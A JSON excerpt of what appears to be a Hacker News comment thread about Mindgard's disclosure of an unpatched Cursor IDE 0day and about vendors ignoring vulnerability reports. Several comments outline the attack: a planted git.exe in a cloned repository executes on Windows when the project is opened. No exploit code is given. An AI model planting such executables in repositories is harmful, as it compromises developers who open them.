them.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T22:16:41.000Z","created_at_i":1784067401,"id":48913617,"options":[],"parent_id":48913340,"points":null,"story_id":48910676,"text":"The CVE process itself is broken. HackerOne and company VDPs are inundated with new reports of varying quality thanks to the advancements (I think) in agentic AI. It&#x27;s allowed for both an increase in trash-tier low quality AND legitimately high quality reports. Since the same AI&#x27;s are writing both, its almost impossible to distinguish between the two at a surface level.<p>In response, companies just aren&#x27;t responding like they used to. I spoke at a cybersecurity conference In June and the overwhelming &quot;vibe&quot; on the floor and in the talks was that responsible disclosure was dead or dying, and public disclosure is the way forward. The Microsoft and Nightmare Eclipse situation was oft cited.","title":null,"type":"comment","url":null},{"author":"_AzMoo","children":[],"created_at":"2026-07-14T22:16:58.000Z","created_at_i":1784067418,"id":48913621,"options":[],"parent_id":48913340,"points":null,"story_id":48910676,"text":"It screams intentional to me.","title":null,"type":"comment","url":null},{"author":"khurs","children":[{"author":"oceansweep","children":[],"created_at":"2026-07-14T22:57:36.000Z","created_at_i":1784069856,"id":48913997,"options":[],"parent_id":48913667,"points":null,"story_id":48910676,"text":"It\u2019s a thing in VSCode as well&#x2F;has been a thing or things similar to it : <a href=\"https:&#x2F;&#x2F;www.threatlocker.com&#x2F;blog&#x2F;malicious-vs-code-tasks-json-abuse-enables-multi-stage-infostealer-deployment\" rel=\"nofollow\">https:&#x2F;&#x2F;www.threatlocker.com&#x2F;blog&#x2F;malicious-vs-code-tasks-js...</a> (2026)<p><a href=\"https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;zes1co&#x2F;visual_studio_code_remote_code_execution_advisory&#x2F;\" rel=\"nofollow\">https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;zes1co&#x2F;visual_...</a> (2022)","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T22:20:36.000Z","created_at_i":1784067636,"id":48913667,"options":[],"parent_id":48913340,"points":null,"story_id":48910676,"text":"Perhaps its a intentional back door?<p>NSA&#x2F;FBI puts a git.exe in GitHub for a target. Target pulls the repo and it executes the payload.<p>As Cursor is&#x2F;was based on VS Code, does it happen in VS Code too?","title":null,"type":"comment","url":null},{"author":"solid_fuel","children":[{"author":"manacit","children":[],"created_at":"2026-07-14T22:36:37.000Z","created_at_i":1784068597,"id":48913811,"options":[],"parent_id":48913794,"points":null,"story_id":48910676,"text":"...that&#x27;s Anthropic?","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T22:35:10.000Z","created_at_i":1784068510,"id":48913794,"options":[],"parent_id":48913340,"points":null,"story_id":48910676,"text":"&gt; I don&#x27;t understand why there&#x27;s such a lack of response on the Cursor side.<p>~~~To busy porting to their new rust-backed version of Bun to do anything boring like engineering, probably.~~~<p>EDIT:<p>My mistake, wrong owners.  It&#x27;s hard to keep these tools straight sometimes.  Most of the LLM tooling and interfaces I&#x27;ve tried are heavy on the features but light on the engineering, and that seems to be the case here too.","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T21:47:46.000Z","created_at_i":1784065666,"id":48913340,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"&gt; The vulnerability was first identified by Mindgard on December 15, 2025. We reported it the same day and multiple times since. More than six months and 197+ new versions later, the issue remains present in the latest tested version of Cursor.<p>&gt; The report was initially closed as Informative and out of scope. After we challenged that determination, HackerOne reopened the report, reproduced the issue, and confirmed that the details had been delivered to Cursor. And then everything stopped. Requests for updates went unanswered, additional follow-ups received no response, escalation through HackerOne produced no meaningful engagement, and direct outreach to Cursor leadership yielded the same result: no response.<p>Really unfortunate. I don&#x27;t understand why there&#x27;s such a lack of response on the Cursor side.","title":null,"type":"comment","url":null},{"author":"hmokiguess","children":[],"created_at":"2026-07-14T23:23:25.000Z","created_at_i":1784071405,"id":48914240,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"The 0 day vulnerability is actually a developer is using Windows","title":null,"type":"comment","url":null},{"author":"imglorp","children":[],"created_at":"2026-07-14T23:38:29.000Z","created_at_i":1784072309,"id":48914369,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"This is exactly why Unix PATH (and offspring) does not contain &quot;.&quot; by default. If you unpack an untrusted archive and run &quot;ls&quot; you could get popped.<p>Agents should be no different.","title":null,"type":"comment","url":null},{"author":"paxys","children":[],"created_at":"2026-07-14T23:39:47.000Z","created_at_i":1784072387,"id":48914379,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"The &quot;why it isn&#x27;t fixed yet&quot; part is pretty simple to understand. They ran the numbers and found that the intersection of developers who:<p>- Use Windows<p>- Don&#x27;t use WSL or any other abstraction, but build&#x2F;run their code directly on Windows<p>- Routinely clone random untrusted repositories<p>is too small to matter. End of story.","title":null,"type":"comment","url":null},{"author":"paxys","children":[],"created_at":"2026-07-14T23:46:04.000Z","created_at_i":1784072764,"id":48914427,"options":[],"parent_id":48910676,"points":null,"story_id":48910676,"text":"Clone a repo and run &quot;npm install&quot; and the exact same thing will happen. You can say &quot;oh I would never run npm install on a repo I don&#x27;t trust&quot;...but then why are you cloning it and opening it in an IDE in the first place? <i>Especially</i> an IDE whose entire purpose is to run autonomous coding agents?","title":null,"type":"comment","url":null}],"created_at":"2026-07-14T17:58:35.000Z","created_at_i":1784051915,"id":48910676,"options":[],"parent_id":null,"points":212,"story_id":48910676,"text":null,"title":"Cursor 0day: When Full Disclosure Becomes the Only Protection Left","type":"story","url":"https://mindgard.ai/blog/cursor-0day-when-full-disclosure-becomes-the-only-protection-left"}
